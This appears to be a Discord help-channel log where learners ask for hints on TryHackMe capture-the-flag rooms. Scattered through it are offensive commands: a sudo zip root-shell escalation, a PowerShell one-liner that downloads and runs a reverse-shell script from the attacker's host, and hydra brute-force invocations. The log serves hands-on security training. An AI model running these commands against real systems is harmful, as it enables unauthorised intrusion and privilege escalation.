#room-hints

never mind got it, turns out i wasnt even vpn'ed in XD

ok got a shell only it should give me root(i believe from the writeup) but it gave me the normal user back

jobs that get executed in a certain timeframe, each time

automated jobs to say it better

....

good question

am i just dumb or just not thinking too much today lol

will do that

thanks you both

What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?

Metasploit:Exploitatioin room: I get the following error when I attempt to bruteforce the smbuser password using the metasploit wordlist and user set to penny: RubySMB::Error::CommunicationError An error occured reading from the Socket no implicit conversion of nil into String

what does no implicit conversion of nil into String mean? 😄

its the last answer to task 2

Hi everyone i just finished the TomGhost room.

I used this command
Dont click the spoiler if u dont want to know how to get root in that room

||TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF||

can anybody explain me how this works? why did i just got a root shell from that, and is there a way to practise this knowledge you can dm me or let it know here.

Thank you for reading.

will do thanks

Gave +1 Rep to @burnt rivet

is there other website that show case how to exploit zip to get root with other way?

or any other binary

i mean other website that can show other method

Hello everyone! I'm currently in the "Walking an Application" room and I'm stumped by the directory listing flag question. I've already done everything else in the room but that and I feel like I'm missing something very basic lol. I keep going to the website the room links to and adding "/.nav-collapse" from the page source, but I just get a page not found message on the website. Could I have a hint to point me in the right direction?

Usually the directories that are holding your resources like js files or any other files of that nature shouldn't be directly accessible, so figure out what that directory name is and if you can access it 🙂

Thank you very much!

Gave +1 Rep to @left thunder

can anyone help me with Corridor

I had a little idea of what to do but it seems pointless now.

|| | hey im doing the Ignite room where im tring to get root, im trying a PATH privilege escalation but for some reason it doenst work? anyone knows why? ||

I am not really sure about path exploitation but when i did that room i just read all the config files that could me something interesting.

ye i found the problem

anyone that can give me a mental push, im doing ignite room and the shell i have is so bad, i have upgraded with python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm/export TERM=xterm-256color. but still linpeas wont work or nano doenst work properly.

You can background the shell with ctrl z, then take a note of column and row output of stty -a, then go back to the shell with stty raw -echo, fg and set the column and row number with stty row … and column ….

will try thank you

Gave +1 Rep to @lyric lichen

You‘re welcome

Since you gained access on the machine, what about getting another rev shell from there, which you can then use to upgrade like usual ?

hmm

smart one

i have just spend 5 hours on a room just to find out the password of root is in a file on the system

Room Learn Linux (web based), Task 21

Ok what specifically do you not understand?

Old one made by paras

how do i check

This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable. 

What confuses you?

where do i check for test1234? in what directory

it says permission denied in ~/ and ./

yes but isnt that the username?

so i used export to set it. and how does that bit help with finding out the password for shiba3?

keeps saying permission denied

guys, need help, have a question on tryhackme like this "Ao enviar dados por TCP, como você chamaria os dados "pequenos"?" Alguém sabe a resposta?

English only in here please

guys, need help, have a question on tryhackme like this "When sending data over TCP, what would you call the "small" data?" Anybody know?

Which room and task is this for ?

room " introduction to network "

Assignment

Link the room pls where it's asking that

Or you saying it is for an assignment ?

can i send a print?

Well I would appreciate if you let me know if this is for a TryHackMe room or for an assignment ?
And if it's for a THM room, to let me have the link to the room

@left thunder https://tryhackme.com/room/introtonetworking
Here

Which layer is tcp ?
Since your answer is right in the text for that layer 🙂

There's a question missing there that I can't get right, the antepenultimate question there

Yes and I just gave you a hint for that question

brother, i did it, i reread everything again and paid more attention to layer 4 you mentioned and i found it bro, thank you very much, you are awesome

Need help hash lvl2 module

Flag.exe
Flag.exe
Sorry! You are still missing something. No flag for you yet. (7)
Anybody got hint for how to run this exe? If you try to run it you get that output.

where am i supposed to run it? at this point im confused on what im actually doing

in the home directory of shiba1

am i supposed to be logged in as shiba2 or 1?

so i need to set test1234 to something?

thnaks it worked. but im so confused how does setting an env var allow to run a binary.

so this behaves like an if statement? as in it will only show the password when a specific env var is created with a specific value?

i got stuck on the shiba4 password now 😦

what should i do if im unable make a directory inside of home?

im doing crack the hash room and i need a little bit of help with hashcat command ( i know how to use it a little bit ) but the thing i dont understand the most is the result from hash-analyzer ... i would be able to choose mode from that anaylzer but there are a few things that i dont understand so i cant really choose the mode for hashcat command ... i cant send ss in this channel maybe can someone dm me to help me? thank u

If you verify, you'll be able to send ss in here

!docs verify

Hi, I think misunderstand something about this Question in task 9. Any hint?

i dont know what mode to use for hashcat in this case

Did you intercept a request, then right click into that request and check all the available options ?

proxy/options

Proxy Listeners
Intercept Client Requests
Intercept Server Responses
Intercept Websockets Messages
Response modification
Match and Replace
Tls Pass Through
Miscellaneous
?

right click on intercept request

scan
send to intruder/repeater/sequencer/comparer/decoder
request in browser, in original session/in current browser session
change request method / body encoding 
...
copy as curl command
don't/do intercept request
URL-encode as you type

I tried these, but nothing match the suggested pattern

i thought this was the only one

are they just directories inside the home directory ?

there is already a test dir and test1234 file in shiba3.

Right click on your intercept and just look in the sub menus

Try making a file in the /tmp directory. 99/100 that’s writable

Or maybe you already had your question answered idk I didn’t read every response I’m sorry

yes, thanks. the folders were already there. i got baited and spent too much time trying to create a dir.

Gave +1 Rep to @burnt rivet

Thx ! to @humble flame and @left thunder It's a bit confusing to miss the point this way, being fed up on the few last sub menus.

Gave +1 Rep to @humble flame

Hello guys, im trying to run john on a file but i'm not being able to crack it. i'm using this input : "john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt", and as output im getting three lines which are: "Using default input encoding: UFT-8, Loaded 1 password hash, No password hashes left to crack" am i missing any parameter? ive done some research and this suppose to work

any help would be nice

Yes

yes cant find nothing

ok needed to remove john.pot ty ty 🙂

Hi guys.I have been given ip: 157.90.147.52 and the challenge is to send back flag names. Does anyone know how to do it?

oh yeah

Hello Admin and everyone,

Please, I will be grateful if someone can help me out with the "breaching Active Directory" room. The reason is I'm trying to set up the DNS IP in the network manager settings and when I'm done with everything and i try to run the following command:

"nslookup thmdc.za.tryhackme.com"

it tells me:

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

Please, someone, help me out please, I really want to understand the Active Directory path. 🙇 🙏

Can you still visit the link?

Sometimes nslookup can be bugged.

It's still the same issue, sir

Or did I do anything wrong?

Can you cat etc/conf.resolv

Common Linux Prives: task 4

whats the password here?

which ip do i use to ssh?

when i hit start machine, attackbox pops up in the split view

i will try restart that might fix it

is this a way to exploit in or is this useless information?

Hi guys

i have a littel problem with last task ( privilege escalation) in the kenobi room

if i try to do

echo /bin/sh > curl

i doesnt but the /bin/sh command in a file curl

if i cat the curl file then

it just says /bin/bash

eh /bin/sh

Im not entirely sure if this is what you want, but try echo '#!/bin/bash' > curl ? then add the rest of your bash script

*im not in the room so im not sure what the instructions are

or /sh instead of /bash if you want

hello
room snort https://tryhackme.com/room/snort
task 3 According to the official description of the snort, what kind of NIPS is it?
I want hint for this task....

should I try every single word in the description...?

The answer can be found in this text.

ok thanks I found it

Gave +1 Rep to @lucid junco

hi guys im doing the alfred ctf right now

ive already logged into jenkins

now it says the following

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

are these 2 different commands?

1-

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1')

Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

or is that one command?

like i run the command like this now

it downloads the file from my python http.server, but i dont receive a connection on my netcat listener

Hi, in Wonderland room I find this poem. I'm not an expert in English. Should I read this poem carefully or it's just content of room ?

That is just content for the room, it's a poem from Alice in Wonderland.

Thanks

Gave +1 Rep to @digital hemlock

Hi, I am doing the lunizz room and i am at this point where I have to crack the password. My script runs an hour now, is this normal?

Hello i need help aha, i am on the "Intro to Digital Forensics: Task 3" . i am told to search google maps for the revealed gps coordinates and i have dont it but i cant find the correct name for the answer XD

The GPS coordinates you get from exiftool are 51 deg 30' 51.90" N, 0 deg 5' 38.73" W. Remember to replace deg with ° and remove the space between the number and the ° symbol before searching.

ill double check aha

that is the hint from said question

shadow can help more if needed be

yeah, i tried it and it took me to a location however i couldn't# find the correct street name. im going to do it again aha

Got it aha thanks :3

no problem

when i did it the first time it took me to a completely different location XD but i have gotten it now. thank you! :3

Hey everyone. Im currently working on the Enumerating FTP room in the cyber defense path. My NMAP scan of the IP seems to be taking an abnormally long time. Can anyone provide any input? Thank you!

I used: nmap x.x.x.x -p- -T4 and I get this warning now: Warning: x.x.x.x giving up on port because retransmission cap hit (6).

do you get the same thing when not using -T4?

also -p- is going to take a fairly long time

I figured it out lmao it was just a straight nmap scan.

nmap [ip]

thanks!

For the Burp Suit Task 8 Bonus question:

[Bonus Question -- Optional] Try performing the capture again, but this time monitor your requests in Wireshark. Can you see why live capturing the requests for this analysis can be described as "loud"?

What would I be looking for that would stand out besides just a lot of requests? I know there is a Wireshark room and I will do that but for now I started Burp Suite and wanted to know what specifically should be standing out in a Wireshark.

@wind nimbus you can also short that time by using :
nmap -p- -n -Pn -A [IP] ....it will be faster and most efficient

Hey guys, i stumbled over some rooms, that require you to use RDP to connect to a vm. Is there any solution on the attack box for rdp?

room: powershell
get-command and get-help are my friends, right?

Yeah i know, meant if there is anything preinstalled, i didnt know about, so i dont have to set it up all over again everytime

room/powershell was specially painful to deal with the delay in rdp 💀

weird I'd done most of the vulnet series, was going to do endgame then saw I haven't done just "vulnnet" yet haha

Hey, can anyone give me a hint for the room Madeye's castle

Nevermind 😎

Hum. that's actually quite a nice room. Steady difficulty throughout, nothing suddenly more complicated.

I've uploaded a php resverse shell script and have gotten a shell, but how do I run bash because the shell is currently so limited, can't cat files etc

have you done usual python3 -c

to stabilise shell

no that's what I'm missing!

Can you point me in the right direction?

python3 -c 'import pty;pty.spawn("/bin/bash")'

aaaah!

ctrl z stty raw -echo; fg

enter enter enter export TERM=xterm

Thank you!

it's a good one to memorise

xD

I will do now that I know it.

+rep @muted parrot

Gave +1 Rep to @muted parrot

a lot of these things are tempting to copy and paste but typing them endlessly just sticks them in. i think that and iex (new-object net.webclient).downloadstring('fffffff

I just wrote it out to try to understand the process

what does this do?

which, python3?7

sorry iex is the powershell command for downloading (and executing) powershell scripts

it's just another one I type a lot :<

hahaha okay cool

so you can host a nishang reverse shell locally, and call it remotely to execute etc.

more to learn haha

always more to learn :-s

Speaking of which, I will make myself a nice coffee

thanks that stabilization worked a charm

with the python command sometimes you won't be able to call bash, just sh, so you'll do "/bin/sh"

I see

yeah you'll have a proper shell now that you can autocomplete and control c etc.

huge help, thanks!

👍 have fun. which box are you doing?

RootMe

Just left the final 2 questions months ago

and wanted to finish it

I think I tried to do it on day 2 of learning

Do we know what the reason is that I need to invoke python instead if something like /bin/bash -i ?

For example:

https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html

Usually these accounts don't have access to a shell. If you look at /etc/passwd you'll see who has shell access, usually exploiting web apps dumps you into www-data

www-data is the account that the web servers run on, but it's not an account you'll want to SSH into.

If you exploit some web app and pop a shell as root it usually means you're in a container 😭

So you use python, because it's always* on Linux, and pty is a default library, so you can use it to spawn process (bash) and control the process through your terminal

Bruh you can help me for solve machine wonderland, im stuck in user rabbit, i can't cek perl, maybe you have clue or hint? Give to me

can someone help with the question "What do you need to access a web application?" (its 7 characters).

firefox, google, what they called?

browser

7 chars

thanks. i swear i tried that a couple times. I guess its time for bed then.

Gave +1 Rep to @languid isle

Hello Can anyone help me in room bufferoverflow brainstorm

the first question is how many ports are open

i use nmap every time i get 3 ports are open

but answer is 6

how can anyone clear me

https://tryhackme.com/room/brainstorm

did u scan all ports ?

Hi! I just need a hint for Confidential idk what tool I’m supposed to be using, any hints?

It would be on the provided vm

Did you fix it? I have the same problem. Some hint with something to decrease the rockyou list to a more compact list would be appreciated.
Testdriving a python
script with a extreme large list is not handy. #mason #bcrypt #Lunizzctf #Lunizz

what is the exact command???

need some assistance doing the john the ripper room having trouble on encrypted zip files just with the taskfiles

And what's the trouble ?

task 9

files wont download locally and cant get it on the attackbox

Are you subscriber ?

how do you transfer ive tried with the clipboard but it doesnt copy the actual file just the text

yeah

Then you for example could just upload the files to a file host and download them inside the attackbox

Or just use scp

Credentials can be found when pressing the info button when having the attackbox open in split view

ohhh right ill give that a go thankyou brother

You are welcome

sftp should also work if you feel that scp is to complicated

looking through option of scp now lol yeah might go stfp

Can you help me with something of the password like length or first two characters so I can make a shorter list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.

Why not use hashcat?

Can you help me with something more of the password like length or first two characters so I can make a short list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.

Is that possible for this situation? Cost factor of 12, bcrypt is very cpu intensive and that is a challenge with my kali vm and rockyou wordlist is very large.

You can give it a shot, https://github.com/HashPals/Search-That-Hash

Try this, might give you an answer

Does that work with salts? Services like Crackstation, etc. work mostly for hash only and no salts.

Probably not but you can give it a try

The concept is nice, but no results with $2b$12$LJ3m4rzPGmuN1U/h0IO55.3h9WhI/A0Rcbchmvk10KWRMWe4me81e
Error: No types found for this hash.

Eh okay, looking at the writeups - brute forcing using the python file shouldn't take that long

Hi at the Hack Park ctf

its says the following

Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

to brute force a http post form

but that isnt how hydra works right?

what do u mean by this? how is it suppose to work?

In Burp Suite Basics Task 9 it asks for an 'option in a drop-down submenu' but I don't see anything that fits the * hint in the box... I'm using the same edition I believe but I might be wrong on that one. Thoughts?

You're looking for something that s inside a menu in the right click.

nvm... I see it now... not something I had ever used or had a reason to work with until just now

thanks for the push @lucid junco

Gave +1 Rep to @lucid junco

it's all in the do and don'ts... I had never thought about filtering what can trigger an unwanted response from a probed service

Can I get a hint on the Metamorphosis room? I can't get any footholds

hi, asking for a quick q regarding this:

i dont know what the 0x201c... string does but it seems to make a payload (?)

Did you try decoding it?

i am stupid, thanks. i get it now 🙂

i guess i was doing the conversion wrong

but i switched over to cyberchef and i get the full payload now

Hi Hackers can you help me to answer this question?
Use the tools introduced in task 2 and provide the name of the malware associated with the IP address

on Pyramid Of Pain room

I'm on Task 6 of Network Services room. I'm progressing ok but can't seem to do nmap scan for all ports with: nmap -p- [ip]

When I enter the command it gives:
Starting nmap 7.6

The cursor just blinks but nothing happens I've waited 40 minutes even. Am I missing something to scan all ports or is it my network?

Thank you @burnt rivet I can see it working now with verbosity. Yes, I tried a number for a range and got it by luck!

Gave +1 Rep to @burnt rivet

Hey 🙂
I am currently at room "Investigating Windows" and am stuck on the third question from the buttom i.e. "What was the extension name of the shell uploaded via the servers website?".
Can someone please give me a hint how to solve this.
I scammed the files in the TMP folder and tried to get some network logs or history but so far I couldn't find anything. All other questions I have already solved.
I am grateful for any help!

Hi, I'm just doing Linux Fundamentals Part 3, and I thought I wasn't dumb, but I'm a little stuck. When I am connecting to Python 3's server. I use python3 -m http.server in which I feel like I should and then the server just never connects, instead I get this screen where I can type but no commands can be used.

this command will host a server in the directory that you are in, it wont connect to a server

Can anyone give me a hint at skynet

room

so far i could log into the email with finding an anonymous smb share

In the email was a reset password

i tried that

to log into his smb share but it failed

With which user?

hello yall

intro to cyber threat intel room

stuck on last one

any hints ?

all the info you need is on the alert log

im tring

there's not many software in that log

omggg im soo dumb

i got it thanks

Gave +1 Rep to @tranquil parcel

without the and didnt work so i was like wtf ?

probably a good idea to not show the answer

Sorry

no worries, was just pointing it out

hello everyone
Can you give me a little hint
Why a cant brute ssh...
I'm going through "Basic Pentesting" room
I found staff.txt in Anonymous Samba, found 2 usernames
And I've already looked that I definitely need to do this

└─$ hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1 

└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1

But hydra cant find anything
[STATUS] 108.00 tries/min, 324 tries in 00:03h, 14344078 to do in 2213:36h, 13 active

Oh, it really did. Thanks)

I think it's a little silly to use such a long brute force in the room, but okay

Long? I don't think 5 mins is that bad

Okay, you know better, I'm a beginner)

Ye, the 5 mins mark is an acceptable time frame for everything bruteforce related here on thm.
If something is taking longer than that, it usually means you are doing something wrong.
Just so you know 🙂

doing overpass 1 > task 1
found Golang net/http server (Go-IPFS json-rpc or InfluxDB API) by scanning with nmap and admin page | download two files (overpass.go and buildscript.sh ) cuz they were given
the hint says owasp top ten vuln so i just wanna ask do i have to read more about Go-IFPS to know more about it or is there a way to approach it ... im not sure what to do at this point

check your cookies

also explore the sites code including the javascript code

Greetings, I would like some help, so im doing Task 13 in "What the Shell" room, but I cant figure out how can I send the shell.exe that I've created on the attack machine to the RDP windows account so I can run it and catch it using multi/handler on the attacking machine. How can I copy it to the target RDP?

thanks

Gave +1 Rep to @burnt rivet

how can i connect to rdp for the windows privesc path

hello i am stack Upload Vulnerabilities task 11 ( when i try to forward burpsuite to find /assets/js/upload.js not work )) can fix that?

rdesktop -u nameuser IP addres

I've been working on the Surfer lab. I'm able to access the console, but not sure what to do from there. I'm given a bit more info about the server and the location of the flag, but I'm not able to access the flag since I'm not internal. Anyone have any tips?

i am also stuck in this exact spot

I feel like I'm overthinking it. @coral grotto I saw you completed it. Any tips?

I'm trying to use SSRF to grab the flag, but no luck

Been digging through the page source to find something else

Yup

I did not think of that...

oh my god it was right there

woops i spoke too soon

got it! thanks @coral grotto

Gave +1 Rep to @coral grotto

No hints for new challenge boxes should be given immediately after a release (72 hours, by default) #rules

Musical Stego room has a problem with the second to last question i think. It says to use a github link instead of a pastebin link because it is down but i think the github link is down aswell.

Can anyone give me a hint for the room "harder"?

can someone give me a hint to "tell nmap to scann all ports?"

man nmap

🤙

howdy folks. I'm working on the intro to c2 room, have armitage up, connected to target machine. I have the admin's hash, but could use a hint on how to get Ted's. Is there a way to swap user?

hashdump is throwing up an error for me

ah, figured it out. Needed to migrate processes for some reason.

for the b99 ctf, got the note and tried hydra on ssh with the user but rockyou doesnt seem to give anything back, any hints?

als my dirb scan gave no real interesting stuff

the sudo password is the same as the account password which you already got

Gave +1 Rep to @alpine kestrel

it did work this time??? if so nice and good luck with the exploiting

yuup as that tends to be how sudo works

it uses the users password and that password tends to be the same when logging in whetever that is ssh or not

the exception is if it is a ssh key file

as those tend to just have an encryption password sometimes and that is not the users password so of course it does not work for sudo

Hello, can someone give me a hint for room "webenumerationv2" - I'm stuck on the Task6, Question5 and would appreciate some help 🙂

I found both virtual hosts from question4 and was scanning both for directories but could only find /js/ and /css/ on both

Well, i scanned both directories on both vhosts for -x.php,.flag,.txt - but maybe i misunderstood the hint?

Hmm i thought so but couldn't find any other directory no matter what i tried... i was using way more lists then mentioned in task5 but had no luck anyway

Yes - only there i think

i. e. "gobuster dir -u http://learning.webenum.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -k"

Oh 🤦‍♂️ thank you

Gave +1 Rep to @burnt rivet

Good evening, I'm in room Windows Internals task 3. Its having me explore ProcMon and its asking me "What is the stack argument of the previous thread?" of notepad.exe, and the hint for the question "Listed as Thread in the event properties" I'm either misunderstanding or it is actually supposed to be the hint of the previous question

disregard I got it

Room: https://tryhackme.com/room/intermediatenmap

Question: Got SSH via one user, but a bit lost where to go. I suspect there's the other port I have to gain access via but I think I'm looking for a private key?

you connected via ssh?

then you should maybe look around on the server, there might be laying a flag 😛

I guess I just overthink everything... Ill look again

I'm so so blind, thank you

Gave +1 Rep to @earnest charm

you're welcome

In the nmap room what is the target machine, do choose one, or did i miss something?

Target machine will be started by pressing the green "Start machine" button attached in one of the tasks

I have the attackbox started, I didn't know they were they same.

They are not the same

Attackbox is different than the target machine

Ok figured it out. Thank you.

Working on Network Services 2, specifically exploiting NFS and checking the permissions of the bash file. I was able to get a solution using ||sudo chmod +s bash|| and ||sudo chmod +x bash|| but I'm not getting the right permission set. My bash file has -rws--s--x whereas the prompt asks for a permission ending in -sr-x. Any idea where I went wrong?

Hi i am workin on the Operating System Security. In the Practical Example of OS Security I am instructed to input ssh "sammie@MACHINE_IP" but i get "ssh: Could not resolve hostname machine_ip: Name or service not known"

The terminal example shows a different result with a login

"MACHINE_IP" doesn't look like an IP, right 😄 ?

So you most likely haven't even started the target machine

No IP is provided and if i use the attackbox IP the password is incorrect I have also used nmap to scan for hosts but none are alive

Ye, because you haven't started the target machine yet.

Attackbox is not the same as the target machine

Target machine gets started with a green "Start Machine" button in one of the tasks

In your case, that button is in task 3

oh... I did not realize that i had to start the target machine. Thank you so much.

yes, but it didn't seem to change the permission to be ending in -sr-x

You right, but it's removing the rwx bits for group and other

Thus leading in having removed the r bit that you are missing

ah, I get it

So, does the order of it matter? ie chmod 600 then +[perm] and then +[perm2]?

Was able to execute bash despite not having the same exact perm the question asked for

Why would you use chmod 600 in the first place ?

Honestly, couldn't figure out why I didn't see the right permissions 😅

First thing my mind went to as I wasn't aware of the +x perm before

Unrelated, same room (Network Services 2) different question; task 9, enumerating MySQL, second question. How are we to extrapolate the password is ||password||? Looking up default login & pass is ||usr: root and no pass|| is there something I missed here?

guessing based on the top 100 most used passwords

probably

Could we use something like hydra to bruteforce a potential password? I tried this but hydra ends promptly after starting, stating 1 of 1 targets completed, 0 valid password found. Using this

You could try it 🙂 ?
But make sure to unpack your rockyou wordlist as well as using -P when specifying a wordlist for the password

Worked! Good eye for capitalizing p, thanks!

Gave +1 Rep to @left thunder

need some help getting john the ripper going

trying "john --wordlist=/usr/share/wordlists/rockyou.txt ssh.txt"

and its saying no password hashes loaded

What's the content of your ssh.txt?

a ssh private key

So you have no hash in there, thus it's saying no password hashes loaded 😉

Did you google how to crack ssh private keys that have a passphrase ?

As it would tell you that you have to use ssh2john first

i did not, thx

Alright, as a general advise, google first, ask later 😄

hello dear gods,
anybody keen on helping me with a horiffic steganography CTF?
I've been looking for hours, but i'm completely stuck. I've been given a .jpg file, and cant find anything.
The flag format is "CTF{*}", and it should be somewhere hidden in the file i think.
The .jpg is too large to send in discord, even when zipped.

Here is the dropbox link, if anybody wants to help:
https://www.dropbox.com/s/h3pi7ow0opa6vyt/WhatDoWeDo.jpg?dl=0

First, the support channels are for tryhackme related questions.
So use #infosec-general for questions outside that scope pls.
Secondly, is this an active CTF ?

Couldn’t find the right channel to put it in. If it’s the wrong one i can move the post, ofc. And yes, it is an active ctf, not one from thm tho, notably. But i thought i’d try my luck here with some smarter heads than my own.

Couldn’t think of any other place to ask

It's fine, but unfortunately we do not help with active CTFs at all

I might have misunderstood the question. It’s not an active CTF as in a competition, or anything like that. It’s was from a ctf internally at work, but we didn’t receive any writeups after it was done. It was kind of like a training exercise thing for security awareness month

Gotcha, although a steganography CTF for security awareness seems a bit odd, we can't help you with it since we can not check on that due to being an internal work CTF, so basically the same applies 😦

cant get the exploit running for the steel mountain ctf

if it continues to act up ill just manually exploit it lol, but anyone got a guess?

The error seems to be straight forward ?

well my dumb half awake brain doesnt see it

Something very likely is already using port 8080 on your machine

srvport needs to be 4444 then?

would that work with the lport also being 4444?

It needs to be any port that is available for usage.
So no, using that port for your server listener and rev shell listener is very likely not going to work

hmm the user.txt gives 2 non recongnized characters

Has anyone had issues in a room where they found the flags, but the answer blank wouldn't take them and/or the answers were out of order? Specifically, I'm having issues with the Jr. Pen Tester Path: Walking an Application, Task 3...the final two flags. Any help is greatly appreciated!

Got it...thanks!

Evading Logging and Monitoring task 10 the binary is just stuck any nudges on that???

Hi everyone! Is there someone that can help me with theseus room? i'm stuck at trying to get to athenes...

I found a file, a raw (data?) file, but strings seems to not find anything and binwalk (-Y) sees an arm 16bit binary in it but i'm not sure because ghidra and r2 gave me no clue

feel free to contact me in private if someone want to help me

Is there anything missing in my command as I'm waiting forever never hitting the right password hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f I modified the clinic.lst with the Single-Extra john rule.

Did you capture a login request to make sure you are using the right url ?

Yes, I also tried with /login-post/index.php

How many lines does wc -l clinic.lst say?

Mh, looks about right, have you tried restarting the target machine already?

This would be my next step! 🙂 Thanks!

Gave +1 Rep to @left thunder

i tried but couldnt figure it out?

"When will the crontab on the deployed instance run?" I checked the ||crontab edit||, and it shows an example of ||5 AM every week|| But the answer is only 7 characters long so what do I have to write in it if I've tried everything?

Okay nevermind, I didn't try the actual thing

but I found the answer

just did it like 5 mins ago lol Thank You!! anyways

Need hints in the last 2 questions of subdomain enumeration. I'm bruteforcing the machine but getting all errors

Okay disregard this one too, I got the answers after reading what errors I was getting lol .

Okay so I'm getting no ||usernames|| in task 2 of ||authentication bypass|| but the requests, some are errors and some are successful. I'm confused as to what I'm looking at

filtering the results doesn't help

perhaps your syntax is wrong?

Looks like your 2nd password parameter is wrong

Better to use copy paste instead of typing the command yourself

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

Actually both password parameters are wrong

Oh, I see where I went wrong, thank you!

Gave +1 Rep to @left thunder

ok guys im kinda stuck im doing the Bolt CMS room where i have to find the version of the CMS, i have tried a version scan on the port the output of that is " (PHP 7.2.32-1)" i have tried to use a CMS scanner that also did not work, i also looked on the source code + burtpsuite to get anyinfo ab the version but still no results. im i thinking to difficult? anyone that can give me a tip?

yes i figured it out

last weeks i have some problems with my dirbuster

its extremly slow

can i get a hint on the Zeno room?

Ran sqlmap and dumped a lot of stuff but that did not seem to be helpful

ran nmap and gobuster ... still nothing

did manual sql injection without any luck

Hi, I really want to get the fourth flag of theseus room, I spent half day to get the first three flags and in a week I was not able to get the last one, if someone made it, could he give me a hint? even in private.
All makes me think that is all about that incomprehensible (to me at least) a * * * * *e file but everything I tried (ghidra, r2, strings, xxd, binwalk and various text conversions) did not help at all...

Running gobuster or ffuf to fuzz a dir and google what technology it is using

task 4 exploiting SMB, after entering "get "Work From Home Information.txt" I enter cat "Work From Home Information.txt" but keep getting command not found.

Can you share screenshot?

!docs verify

And btw if you are doing cat in smb it wont work, you have to exit smb and then cat that text file

get *file* downloads the file from smb to your host.

doing the blue room as i still havent done it. now i remember again why

exploit hits a wall at triggering free at corrupted buffer and fails

and yes RHOSTS is set correctly

if it still doesnt work ill just try manual exploitation instead

Your LHOST is wrong.

You need to set the LHOST to your tun0

damnit

why do i always oversee just everything but 1 thing

thank you mate

It's OK, it's a common thing people get wrong, I don't think the room mentions it.

it's all good. that's how you learn. now you know for the next time you set metasploit options

Thank you

Gave +1 Rep to @cold eagle

Thank you, that worked

When doing the "exploiting telnet" task. Am I suppose to be doing the active machine ip in red? Cause that 1 keeps coming up "no routes found"

no. "tun0" is the actual command that's used. it uses your host machine's ip

even "ip" is supposed to be typed out. it's not actually asking for an ip

well, "tun0" is you're using a vpn and "eth0" if you're using the attack box

Thank you

Gave +1 Rep to @wicked mirage

cheers

He should get 2, double assisted

!dark

Dammit.

Done with that already haha

on the new Benign room where are the splunk logs located at ?

go to search then select "All time" filter and then run in the query bar "*" and all the logs will be displayed

hi this might be a dumb question but how do i connect to the benign room's machine? connect via rdp?

web browser

i tried that way as well it didnt work

https://x.x. xx.xxx:8000

just go to the machine ip in a web browser and it will launch a splunk

lemme try again

no port 80

it worked ty!

just finished it. this one was pretty coool

Does anyone know a command that can be used for listing open ports that is not netstat, lsof, or ss and would fit into this answer format: ****** **********? I've been searching for a solution for ages now.

Room and task?

Room name: Linux Modules (https://tryhackme.com/room/linuxmodules)
Section: Other modules
4th Question

Oh, that one.

The answer is in the task.

Somewhere here. 😄

Hmm oke

Thank you

Gave +1 Rep to @lucid junco

Figured it out 👍

hi guys

can any one help with room RazorBlack

Has anyone got any Tips on the Steel mountain room? I'm having issue replacing the service due to permissions

can you give me a nudge on Benign??

@dusky perch Please don't post massive text walls

Why am I not able to post pics?

You haven't verified your THM account with the bot

!docs verify

There's no bot on the top right of my pagr

This is ridiculous just to get help. Where am I suppose to find this token crap? I shouldn't need to go through all this just to get help

I see the bot. It should be just under the discord admin group.

I messaged the bot and got some b.s response about a token. I don't use discord. I have no idea what it's talking about a token. But there's no token where that bot said it would be. Idk why I can have a link sent or something normal to be verified. I can't even post a pic showing what I'm talking about

This shits broken. I send everything it asked and it still says it can't verify.
I need to get these tasks done so who can inbox me so I screen screen shot my issue.????

Nvm. The fb group helped.

what is the "bs response"?

The token is found on your profile https://tryhackme.com/profile

Are you definitely trying to verify with the TryHackMe Bot?

Mate, chill out. Most of hacking is solving problems. If you're going to go off the deep end because you can't figure something out, you're not going to get very far.

active directory basics room doesnt give me a password or anything to login with

only username

Can you link?

Do you see the image with the credentials?

....

imma facepalm myself real quick

jesus this takes the cake

😂

Hi, I'm looking for a nudge for Benign. I'm on question 9 of Task 2 and I know the suspicious file, but I don't know how to look at it to find the pattern.

#1035192394720751696

Thanks 👍

Gave +1 Rep to @trim haven

same here

Look for bak

I haven't been able to work on it, but I'll repost a question on #1035192394720751696 after I complete PrintNightmare, again! I guess I'm too use to Wireshark, and I'm expecting to see more.

Any hint on full registry path

I found it by using ProcDOT and just clicking on the Yellow boxes

Any hint on how to find the imposter?

Look for where ||powershell history|| is kept

I'm assuming you are on printnightmare, again and working on question 7 -- Am I right?

no I'm on Benign

ok, in splunk to the left there should be a filter for usernames, check there, closely.

yeah I figured it out I had to delete a few of the names to see the rest of them now I'm trying to figure out how to find the "Pattern"

any nudges on the The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?

for splunk challenge 1

im seeing the before and after events of the downloaded file but cant correlate to get the answer

ok guys and gals I'm stuck on Walking an Application Task 3 Question 3 and 4. I tried using /Assets + https://10-10-115-124.p.thmlabs.com/, since that's the directly listing in the page source code. But that's not it. Any hints or help I would greatly appreciate it.

n

e

Hey I want help for https://tryhackme.com/room/linprivesc this room Task 11

I am getting 'GLIBC_2.34'not found I checked my code many times and also I am doing everything correct then also

I am always getting this error

I'm stuck finding the first answer for
Windows Fundamentals 2 Task 2 question 1.
